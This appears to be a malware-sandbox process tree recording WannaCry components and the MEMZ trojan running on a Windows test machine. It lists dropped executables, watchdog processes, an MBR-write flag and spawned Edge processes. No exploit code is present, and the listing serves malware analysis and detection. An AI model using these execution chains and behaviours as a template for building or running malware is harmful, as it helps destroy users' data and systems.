C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718 | 4⤵
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | @WanaDecryptor@.exe | 3⤵
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe | taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe | 3⤵
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe | taskdl.exe | 3⤵
-
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe | "C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" | 2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe | "C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /watchdog | 3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe | "C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /watchdog | 3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe | "C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /watchdog | 3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe | "C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /watchdog | 3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe | "C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /watchdog | 3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe | "C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /main | 3⤵
- Checks computer location settings
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\notepad.exe | "C:\Windows\System32\notepad.exe" \note.txt | 4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+to+create+your+own+ransomware | 4⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 /prefetch:3 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2264 /prefetch:8 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings | 5⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1bc,0x22c,0x7ff735615460,0x7ff735615470,0x7ff735615480 | 6⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6120 /prefetch:2 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6520 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6712 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7080 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7284 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1740 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3928 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7368 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7464 /prefetch:1 | 5⤵
-
